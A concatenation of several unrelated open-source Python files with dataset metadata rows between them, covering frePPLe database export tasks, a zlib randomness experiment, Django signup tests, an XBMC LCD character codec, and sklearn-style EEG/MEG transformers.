values(%%s,%%s,%%s,%%s,%%s * interval '1 second',%%s,%%s,%%s,%%s%s)
on conflict (setupmatrix_id, priority)
do update set
fromsetup=excluded.fromsetup,
tosetup=excluded.tosetup,
duration=excluded.duration,
cost=excluded.cost,
resource_id=excluded.resource_id,
source=excluded.source,
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
@PlanTaskRegistry.register
class exportSkills(PlanTask):
description = ("Export static data", "Export skills")
sequence = (305, "exportstatic1", 2)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Skill)]
def getData():
for i in frepple.skills():
if source and source != i.source:
continue
r = [i.name, i.source, cls.timestamp]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""insert into skill
(name,source,lastmodified%s)
values(%%s,%%s,%%s%s)
on conflict (name)
do update set
source=excluded.source,
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
@PlanTaskRegistry.register
class exportResourceSkills(PlanTask):
description = ("Export static data", "Export resource skills")
sequence = (305, "exportstatic1", 3)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(ResourceSkill)]
def getData():
for s in frepple.skills():
for i in s.resourceskills:
if source and source != i.source:
continue
r = [
i.effective_start
if i.effective_start != default_start
else None,
i.effective_end if i.effective_end != default_end else None,
i.priority,
i.source,
cls.timestamp,
i.resource.name,
s.name,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""
insert into resourceskill
(effective_start,effective_end,priority,source,lastmodified,resource_id,skill_id%s)
values(%%s,%%s,%%s,%%s,%%s,%%s,%%s%s)
on conflict (resource_id, skill_id)
do update set
effective_start=excluded.effective_start,
effective_end=excluded.effective_end,
priority=excluded.priority,
source=excluded.source,
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
@PlanTaskRegistry.register
class exportOperationResources(PlanTask):
description = ("Export static data", "Export operation resources")
sequence = (305, "exportstatic1", 4)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(OperationResource)]
def getData():
for o in frepple.operations():
if o.hidden:
continue
for i in o.loads:
if i.hidden or (source and source != i.source):
continue
r = [
i.operation.name,
i.resource.name,
i.effective_start
if i.effective_start != default_start
else None,
i.effective_end if i.effective_end != default_end else None,
round(i.quantity, 8),
i.setup,
i.name,
i.priority,
map_search[i.search]
if map_search[i.search] != "PRIORITY"
else None,
i.source,
i.skill.name if i.skill else None,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""
insert into operationresource
(operation_id,resource_id,effective_start,effective_end,
quantity,setup,name,priority,search,source,skill_id,lastmodified%s)
values(%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s%s)
on conflict (operation_id, resource_id, effective_start)
do update set
effective_end=excluded.effective_end,
quantity=excluded.quantity,
setup=excluded.setup,
name=excluded.name,
priority=excluded.priority,
search=excluded.search,
skill_id=excluded.skill_id,
source=excluded.source,
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
@PlanTaskRegistry.register
class exportCustomers(PlanTask):
description = ("Export static data", "Export customers")
sequence = (305, "exportstatic2", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Customer)]
def getData():
for i in frepple.customers():
if source and source != i.source:
continue
r = [
i.name,
i.description,
i.category,
i.subcategory,
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
def getOwners():
for i in frepple.customers():
if i.owner and (not source or source == i.source):
yield (i.owner.name, i.name)
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""
insert into customer
(name,description,category,subcategory,source,lastmodified,owner_id%s)
values(%%s,%%s,%%s,%%s,%%s,%%s,null%s)
on conflict (name)
do update set
description=excluded.description,
category=excluded.category,
subcategory=excluded.subcategory,
source=excluded.source,
lastmodified=excluded.lastmodified,
owner_id=excluded.owner_id
%s
"""
% SQL4attributes(attrs),
getData(),
)
execute_batch(
cursor, "update customer set owner_id=%s where name=%s", getOwners()
)
@PlanTaskRegistry.register
class exportDemands(PlanTask):
description = ("Export static data", "Export sales orders")
sequence = (305, "exportstatic2", 2)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Demand)]
def getData():
for i in frepple.demands():
if (
not isinstance(i, frepple.demand_default)
or i.hidden
or (source and source != i.source)
):
continue
r = [
i.name,
i.due,
round(i.quantity, 8),
i.priority,
i.item.name,
i.location.name if i.location else None,
i.operation.name
if i.operation and not i.operation.hidden
else None,
i.customer.name if i.customer else None,
round(i.minshipment, 8),
i.maxlateness,
i.category,
i.subcategory,
i.source,
i.description,
cls.timestamp,
i.status,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
def getOwners():
for i in frepple.demands():
if (
i.owner
and isinstance(i, frepple.demand_default)
and not i.hidden
and (not source or source == i.source)
):
yield (i.owner.name, i.name)
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""
insert into demand
(name,due,quantity,priority,item_id,location_id,operation_id,customer_id,
minshipment,maxlateness,category,subcategory,source,description,lastmodified,
status,owner_id%s)
values(%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s * interval '1 second',%%s,%%s,%%s,%%s,%%s,%%s,null%s)
on conflict (name)
do update set
due=excluded.due,
quantity=excluded.quantity,
priority=excluded.priority,
item_id=excluded.item_id,
location_id=excluded.location_id,
operation_id=excluded.operation_id,
customer_id=excluded.customer_id,
minshipment=excluded.minshipment,
maxlateness=excluded.maxlateness,
category=excluded.category,
description=excluded.description,
source=excluded.source,
lastmodified=excluded.lastmodified,
status=excluded.status,
owner_id=excluded.owner_id
%s
"""
% SQL4attributes(attrs),
getData(),
)
execute_batch(
cursor, "update demand set owner_id=%s where name=%s", getOwners()
)
@PlanTaskRegistry.register
class exportCalendarBuckets(PlanTask):
description = ("Export static data", "Export calendar buckets")
sequence = (305, "exportstatic3", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(CalendarBucket)]
def int_to_time(i):
hour = i // 3600
i -= hour * 3600
minute = i // 60
i -= minute * 60
second = i
if hour >= 24:
hour -= 24
return "%s:%s:%s" % (hour, minute, second)
def getData(cursor):
cursor.execute("SELECT max(id) FROM calendarbucket")
cnt = cursor.fetchone()[0] or 1
for c in frepple.calendars():
if (
c.hidden
or c.source == "common_bucket"
or (source and source != c.source)
):
continue
for i in c.buckets:
cnt += 1
r = [
c.name,
i.start if i.start != default_start else None,
i.end if i.end != default_end else None,
cnt,
i.priority,
round(i.value, 8),
True if (i.days & 1) else False,
True if (i.days & 2) else False,
True if (i.days & 4) else False,
True if (i.days & 8) else False,
True if (i.days & 16) else False,
True if (i.days & 32) else False,
True if (i.days & 64) else False,
int_to_time(i.starttime),
int_to_time(i.endtime - 1),
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
if source:
cursor.execute("delete from calendarbucket where source = %s", [source])
else:
cursor.execute("delete from calendarbucket")
execute_batch(
cursor,
"""
insert into calendarbucket
(calendar_id,startdate,enddate,id,priority,value,
sunday,monday,tuesday,wednesday,thursday,friday,saturday,
starttime,endtime,source,lastmodified%s)
values(%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s%s)
"""
% SQL4attributes(attrs, with_on_conflict=False),
getData(cursor),
)
@PlanTaskRegistry.register
class exportBuffers(PlanTask):
description = ("Export static data", "Export buffers")
sequence = (305, "exportstatic4", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Buffer)]
def getData():
for i in frepple.buffers():
if i.hidden or (source and source != i.source):
continue
r = [
i.item.name,
i.location.name,
i.batch or None,
i.description,
round(i.onhand, 8),
round(i.minimum, 8),
i.minimum_calendar.name if i.minimum_calendar else None,
i.__class__.__name__[7:],
i.category,
i.subcategory,
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""
insert into buffer
(item_id,location_id,batch,description,onhand,minimum,minimum_calendar_id,
type,category,subcategory,source,lastmodified%s)
values(%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s%s)
on conflict (location_id, item_id, batch)
do update set
description=excluded.description,
onhand=excluded.onhand,
minimum=excluded.minimum,
minimum_calendar_id=excluded.minimum_calendar_id,
type=excluded.type,
category=excluded.category,
subcategory=excluded.subcategory,
source=excluded.source,
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
@PlanTaskRegistry.register
class exportOperationMaterials(PlanTask):
description = ("Export static data", "Export operation material")
sequence = (305, "exportstatic4", 2)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(OperationMaterial)]
def getData():
for o in frepple.operations():
if o.hidden:
continue
for i in o.flows:
if i.hidden or (source and source != i.source):
continue
r = [
i.operation.name,
i.buffer.item.name,
i.effective_start
if i.effective_start != default_start
else None,
round(i.quantity, 8),
i.type[5:],
i.effective_end if i.effective_end != default_end else None,
i.name,
i.priority,
map_search[i.search]
if map_search[i.search] != "PRIORITY"
else None,
i.source,
round(i.transferbatch, 8)
if isinstance(i, frepple.flow_transfer_batch)
else None,
i.offset,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""
insert into operationmaterial
(operation_id,item_id,effective_start,quantity,type,effective_end,
name,priority,search,source,transferbatch,"offset",lastmodified%s)
values(%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s * interval '1 second',%%s%s)
on conflict (operation_id, item_id, effective_start)
do update set
quantity=excluded.quantity,
type=excluded.type,
effective_end=excluded.effective_end,
name=excluded.name,
priority=excluded.priority,
search=excluded.search,
source=excluded.source,
transferbatch=excluded.transferbatch,
"offset"=excluded."offset",
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
@PlanTaskRegistry.register
class exportSuppliers(PlanTask):
description = ("Export static data", "Export suppliers")
sequence = (305, "exportstatic4", 3)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Supplier)]
def getData():
for i in frepple.suppliers():
if source and source != i.source:
continue
r = [
i.name,
i.description,
i.category,
i.subcategory,
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
def getOwners():
for i in frepple.suppliers():
if i.owner and (not source or source == i.source):
yield (i.owner.name, i.name)
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""
insert into supplier
(name,description,category,subcategory,source,lastmodified,owner_id%s)
values(%%s,%%s,%%s,%%s,%%s,%%s,null%s)
on conflict (name)
do update set
description=excluded.description,
category=excluded.category,
subcategory=excluded.subcategory,
source=excluded.source,
lastmodified=excluded.lastmodified,
owner_id=excluded.owner_id
%s
"""
% SQL4attributes(attrs),
getData(),
)
execute_batch(
cursor, "update supplier set owner_id=%s where name=%s", getOwners()
)
@PlanTaskRegistry.register
class exportItemSuppliers(PlanTask):
description = ("Export static data", "Export item suppliers")
sequence = (305, "exportstatic4", 4)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(ItemSupplier)]
def getData():
for s in frepple.suppliers():
if source and source != s.source:
continue
for i in s.itemsuppliers:
if i.hidden or (source and source != i.source):
continue
r = [
i.item.name,
i.location.name if i.location else None,
i.supplier.name,
i.effective_start
if i.effective_start != default_start
else None,
i.leadtime,
i.size_minimum,
i.size_multiple,
i.cost,
i.priority,
i.effective_end if i.effective_end != default_end else None,
i.resource.name if i.resource else None,
i.resource_qty,
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""
insert into itemsupplier
(item_id,location_id,supplier_id,effective_start,leadtime,sizeminimum,
sizemultiple,cost,priority,effective_end,resource_id,resource_qty,source,
lastmodified%s)
values(%%s,%%s,%%s,%%s,%%s * interval '1 second',%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s%s)
on conflict (item_id, location_id, supplier_id, effective_start)
do update set
leadtime=excluded.leadtime,
sizeminimum=excluded.sizeminimum,
sizemultiple=excluded.sizemultiple,
cost=excluded.cost,
priority=excluded.priority,
effective_end=excluded.effective_end,
resource_id=excluded.resource_id,
resource_qty=excluded.resource_qty,
source=excluded.source,
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
@PlanTaskRegistry.register
class exportItemDistributions(PlanTask):
description = ("Export static data", "Export item distributions")
sequence = (305, "exportstatic4", 5)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(ItemDistribution)]
def getData():
for s in frepple.items():
if s.hidden or (source and source != s.source):
continue
for i in s.itemdistributions:
if i.hidden or (source and source != i.source):
continue
r = [
i.item.name,
i.destination.name if i.destination else None,
i.origin.name,
i.effective_start
if i.effective_start != default_start
else None,
i.leadtime,
i.size_minimum,
i.size_multiple,
i.cost,
i.priority,
i.effective_end if i.effective_end != default_end else None,
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""
insert into itemdistribution
(item_id,location_id,origin_id,effective_start,leadtime,sizeminimum,
sizemultiple,cost,priority,effective_end,source,lastmodified%s)
values(%%s,%%s,%%s,%%s,%%s * interval '1 second',%%s,%%s,%%s,%%s,%%s,%%s,%%s%s)
on conflict (item_id, location_id, origin_id, effective_start)
do update set
leadtime=excluded.leadtime,
sizeminimum=excluded.sizeminimum,
sizemultiple=excluded.sizemultiple,
cost=excluded.cost,
priority=excluded.priority,
effective_end=excluded.effective_end,
source=excluded.source,
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
| agpl-3.0 | 6,350,968,062,602,810,000 | 35.393553 | 130 | 0.482285 | false | 4.712584 | false | false | false |
lukasschwab/code-golf | randomness-test.py | 1 | 1094 | # I want to test the randomness of a random number generator.
# How does randomness increase as you nest pseudorandom number generators?
# I thought no, but wanted to confirm for myself.
# E.g. Randomly selecting from a randomly shuffled list would be two degrees.
# Why use compression? Check this out: https://csclub.uwaterloo.ca/~mtahmed/work_reports/mtahmed_workreport_s12.pdf
# zlib is the python library that does compression.
import zlib
# and this is for randomness!
import random
digitsStr = range(0, 10)
iterations = 0
while iterations <= 100:
# This generates a random string of numbers.
uncompressedStr = ""
while len(uncompressedStr) < 200000:
repeat = 0
scrambledDigits = digitsStr
uncompressedStr += str(scrambledDigits[random.randint(0,9)])
repeat = 0
while repeat < iterations:
random.shuffle(list(uncompressedStr))
repeat += 1
uncompressedStr = ''.join(uncompressedStr)
compressedStr = zlib.compress(uncompressedStr)
randomness = float(len(compressedStr))/float(len(uncompressedStr))
print randomness
iterations = iterations+1
| mit | -2,690,453,327,420,816,000 | 29.388889 | 115 | 0.749543 | false | 3.683502 | false | false | false |
elricgit/django-social-launch | django_social_launch/tests/test_urls.py | 1 | 7742 | #Django imports
from django.conf import settings
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.contrib.sessions.backends.db import SessionStore
#App imports
from .. import user_successfully_created_msg, referrer_url_session_key, referring_user_id_session_key
from ..models import SocialLaunchProfile
#Test imports
from .util import BaseTestCase
class IndexTestCase(BaseTestCase):
def test_get(self):
response = self.client.get(reverse('social_launch_index'))
self.assertEqual(response.status_code, 200)
def test_get_with_referrer(self):
referrer_url = 'http://facebook.com'
response = self.client.get(reverse('social_launch_index'), HTTP_REFERER=referrer_url)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.client.session[referrer_url_session_key], referrer_url)
def test_post_success_creates_new_user(self):
post_data = {'email' : '[email protected]'}
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
response = self.client.post(reverse('social_launch_index'), post_data, follow=True)
users = User.objects.all()
slps = SocialLaunchProfile.objects.all()
self.assertEquals(len(users), 2)
self.assertEquals(len(slps), 1)
user = users[1]
slp = slps[0]
self.assertRedirects(response, reverse('social_launch_referral', kwargs={'referring_user_id' : user.id}))
self.assertEquals(user.email, post_data['email'])
self.assertEquals(user.username, post_data['email'])
self.assertFalse(user.has_usable_password())
self.assertContains(response, user_successfully_created_msg)
self.assertEquals(slp.user, user)
self.assertEquals(slp.referrer_url, '')
self.assertEquals(slp.referring_user, None)
def test_post_success_creates_new_user_with_referrer(self):
referrer_url = 'http://facebook.com'
post_data = {'email' : '[email protected]'}
session = SessionStore()
session[referrer_url_session_key] = referrer_url
session[referring_user_id_session_key] = ''
session.save()
self.client.cookies[settings.SESSION_COOKIE_NAME] = session.session_key
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
response = self.client.post(reverse('social_launch_index'), post_data, follow=True)
users = User.objects.all()
slps = SocialLaunchProfile.objects.all()
self.assertEquals(len(users), 2)
self.assertEquals(len(slps), 1)
user = users[1]
slp = slps[0]
self.assertRedirects(response, reverse('social_launch_referral', kwargs={'referring_user_id' : user.id}))
self.assertEquals(user.email, post_data['email'])
self.assertEquals(user.username, post_data['email'])
self.assertFalse(user.has_usable_password())
self.assertContains(response, user_successfully_created_msg)
self.assertEquals(slp.user, user)
self.assertEquals(slp.referrer_url, referrer_url)
self.assertEquals(slp.referring_user, None)
def test_post_fails_invalid_email(self):
post_data = {'email' : 'fooexample.com'}
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
response = self.client.post(reverse('social_launch_index'), post_data)
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, user_successfully_created_msg)
def test_post_fails_invalid_email_with_referrer(self):
referrer_url = 'http://facebook.com'
post_data = {'email' : 'fooexample.com'}
session = SessionStore()
session[referrer_url_session_key] = referrer_url
session[referring_user_id_session_key] = ''
session.save()
self.client.cookies[settings.SESSION_COOKIE_NAME] = session.session_key
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
response = self.client.post(reverse('social_launch_index'), post_data)
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, user_successfully_created_msg)
self.assertEqual(self.client.session[referrer_url_session_key], referrer_url)
def test_post_fails_no_email(self):
post_data = {}
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
response = self.client.post(reverse('social_launch_index'), post_data)
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, user_successfully_created_msg)
class ReferralTestCase(BaseTestCase):
def test_get_success(self):
response = self.client.get(reverse('social_launch_referral', kwargs={'referring_user_id' : self.user1.id}))
self.assertEqual(response.status_code, 200)
def test_get_fails_invalid_id(self):
response = self.client.get(reverse('social_launch_referral', kwargs={'referring_user_id' : 'foo'}))
self.assertEqual(response.status_code, 404)
def test_get_fails_no_such_user(self):
response = self.client.get(reverse('social_launch_referral', kwargs={'referring_user_id' : 1000}))
self.assertEqual(response.status_code, 404)
def test_post_success_creates_new_user(self):
post_data = {'email' : '[email protected]'}
session = SessionStore()
session[referring_user_id_session_key] = self.user1.id
session.save()
self.client.cookies[settings.SESSION_COOKIE_NAME] = session.session_key
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
response = self.client.post(reverse('social_launch_referral', kwargs={'referring_user_id' : self.user1.id}), post_data, follow=True)
users = User.objects.all()
slps = SocialLaunchProfile.objects.all()
self.assertEquals(len(users), 2)
self.assertEquals(len(slps), 1)
user = users[1]
slp = slps[0]
self.assertRedirects(response, reverse('social_launch_referral', kwargs={'referring_user_id' : user.id}))
self.assertEquals(user.email, post_data['email'])
self.assertEquals(user.username, post_data['email'])
self.assertFalse(user.has_usable_password())
self.assertContains(response, user_successfully_created_msg)
self.assertEquals(slp.user, user)
self.assertEquals(slp.referrer_url, '')
self.assertEquals(slp.referring_user, self.user1)
def test_post_success_creates_new_user_bad_referring_used_id(self):
post_data = {'email' : '[email protected]'}
session = SessionStore()
session[referring_user_id_session_key] = 1000
session.save()
self.client.cookies[settings.SESSION_COOKIE_NAME] = session.session_key
self.assertEqual(User.objects.count(), 1)
self.assertEqual(SocialLaunchProfile.objects.count(), 0)
response = self.client.post(reverse('social_launch_referral', kwargs={'referring_user_id' : self.user1.id}), post_data, follow=True)
users = User.objects.all()
slps = SocialLaunchProfile.objects.all()
self.assertEquals(len(users), 2)
self.assertEquals(len(slps), 1)
user = users[1]
slp = slps[0]
self.assertRedirects(response, reverse('social_launch_referral', kwargs={'referring_user_id' : user.id}))
self.assertEquals(user.email, post_data['email'])
self.assertEquals(user.username, post_data['email'])
self.assertFalse(user.has_usable_password())
self.assertContains(response, user_successfully_created_msg)
self.assertEquals(slp.user, user)
self.assertEquals(slp.referrer_url, '')
self.assertEquals(slp.referring_user, None)
| bsd-3-clause | -8,356,192,776,099,714,000 | 34.513761 | 134 | 0.731465 | false | 3.212448 | true | false | false |
ajw107/script.xbmc.lcdproc | resources/lib/charset_hd44780.py | 1 | 2826 | '''
XBMC LCDproc addon
Copyright (C) 2012 Team XBMC
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import codecs
from charset_map_hd44780_a00 import *
from charset_map_hd44780_a02 import *
class HD44780_Codec(codecs.Codec):
def encode_a00(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encmap_hd44780_a00)
def encode_a02(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encmap_hd44780_a02)
def decode(self,input,errors='strict'):
pass
class HD44780_IncrementalEncoder_a00(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encmap_hd44780_a00)[0]
class HD44780_IncrementalEncoder_a02(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encmap_hd44780_a02)[0]
class HD44780_IncrementalDecoder(codecs.IncrementalDecoder):
pass
class HD44780_StreamWriter(HD44780_Codec,codecs.StreamWriter):
pass
class HD44780_StreamReader(HD44780_Codec,codecs.StreamReader):
pass
def charset_hd44780(name):
if name == "hd44780-a00":
return codecs.CodecInfo(
name = "hd44780-a00",
encode = HD44780_Codec().encode_a00,
decode = HD44780_Codec().decode,
incrementalencoder = HD44780_IncrementalEncoder_a00,
incrementaldecoder = HD44780_IncrementalDecoder,
streamreader = HD44780_StreamReader,
streamwriter = HD44780_StreamWriter,
)
elif name == "hd44780-a02":
return codecs.CodecInfo(
name = "hd44780-a02",
encode = HD44780_Codec().encode_a02,
decode = HD44780_Codec().decode,
incrementalencoder = HD44780_IncrementalEncoder_a02,
incrementaldecoder = HD44780_IncrementalDecoder,
streamreader = HD44780_StreamReader,
streamwriter = HD44780_StreamWriter,
)
else:
return None
| gpl-2.0 | -5,305,902,910,726,653,000 | 35.701299 | 75 | 0.703822 | false | 3.844898 | false | false | false |
kingjr/jr-tools | jr/gat/transformers.py | 1 | 14857 | import numpy as np
from sklearn.base import TransformerMixin, BaseEstimator, clone
from sklearn.linear_model import LogisticRegression
from mne.parallel import parallel_func
from nose.tools import assert_true
class _BaseEstimator(BaseEstimator, TransformerMixin):
def fit(self, X, y=None):
return self
def fit_transform(self, X, y=None):
return self.fit(X, y).transform(X)
def baseline(X, mode, tslice):
if X.shape[-1] > 0:
mean = np.mean(X[..., tslice], axis=-1)[..., None]
else:
mean = 0 # otherwise we get an ugly nan
if mode == 'mean':
X -= mean
if mode == 'logratio':
X /= mean
X = np.log10(X) # a value of 1 means 10 times bigger
if mode == 'ratio':
X /= mean
elif mode == 'zscore':
std = np.std(X[..., tslice], axis=-1)[..., None]
X -= mean
X /= std
elif mode == 'percent':
X -= mean
X /= mean
elif mode == 'zlogratio':
X /= mean
X = np.log10(X)
std = np.std(X[..., tslice], axis=-1)[..., None]
X /= std
return X
class EpochsBaseliner(_BaseEstimator):
def __init__(self, tslice=None, mode='mean'):
self.mode = mode
self.tslice = slice(None) if tslice is None else tslice
assert_true(self.mode in ['mean', 'logratio', 'ratio', 'zscore',
'percent', 'zlogratio'])
assert_true(isinstance(self.tslice, (slice, int)))
def transform(self, X):
return baseline(X, self.mode, self.tslice)
class TimeFreqBaseliner(_BaseEstimator):
def __init__(self, tslice=None, mode='mean'):
self.mode = mode
self.tslice = slice(None) if tslice is None else tslice
assert_true(self.mode in ['mean', 'logratio', 'ratio', 'zscore',
'percent', 'zlogratio'])
def transform(self, X):
return baseline(X, self.mode, self.tslice)
class TimePadder(_BaseEstimator):
"""Padd time before and after epochs"""
def __init__(self, n_sample, value=0.):
self.n_sample = n_sample
assert_true(isinstance(self.n_sample, int))
self.value = value
assert_true(isinstance(value, (int, float)) or (value == 'median'))
def transform(self, X):
if self.value == 'median':
coefs = np.median(X, axis=2)
else:
coefs = self.value * np.ones(X.shape[:2])
coefs = np.tile(coefs, [self.n_sample, 1, 1]).transpose([1, 2, 0])
X = np.concatenate((coefs, X, coefs), axis=2)
return X
def inverse_transform(self, X):
X = X[:, :, self.n_sample:-self.n_sample]
return X
class TimeSelector(_BaseEstimator):
"""Padd time before and after epochs"""
def __init__(self, tslice):
self.tslice = tslice
assert_true(isinstance(self.tslice, (slice, int)))
def fit_transform(self, X, y=None):
return self.transform(X)
def transform(self, X):
X = X[:, :, self.tslice]
return X
class TimeFreqSelector(_BaseEstimator):
"""Padd time before and after epochs"""
def __init__(self, tslice=None, fslice=None):
self.tslice = slice(None) if tslice is None else tslice
self.fslice = slice(None) if fslice is None else fslice
assert_true(isinstance(self.tslice, (slice, int)))
assert_true(isinstance(self.fslice, (slice, int)))
def fit_transform(self, X, y=None):
return self.transform(X)
def transform(self, X):
X = X[:, :, :, self.tslice]
X = X[:, :, self.fslice, :]
return X
class MyXDawn(_BaseEstimator):
"""Wrapper for pyriemann Xdawn + robust.
Will eventually need to clean both MNE and pyriemann with refactorings"""
def __init__(self, n_filter=4, estimator='scm'):
from pyriemann.estimation import Xdawn
self.n_filter = n_filter
assert_true(isinstance(self.n_filter, int))
self.estimator = estimator
assert_true(isinstance(estimator, str))
self._xdawn = Xdawn(nfilter=n_filter, estimator=estimator)
def fit(self, X, y):
# only apply on channels who std > 0 across time on at least one trial
self.picks_ = np.where(np.mean(np.std(X, axis=2) ** 2, axis=0))[0]
self._xdawn.fit(X[:, self.picks_, :], y)
return self
def transform(self, X):
return self._xdawn.transform(X[:, self.picks_, :])
def fit_transform(self, X, y=None):
self.fit(X, y)
return self.transform(X)
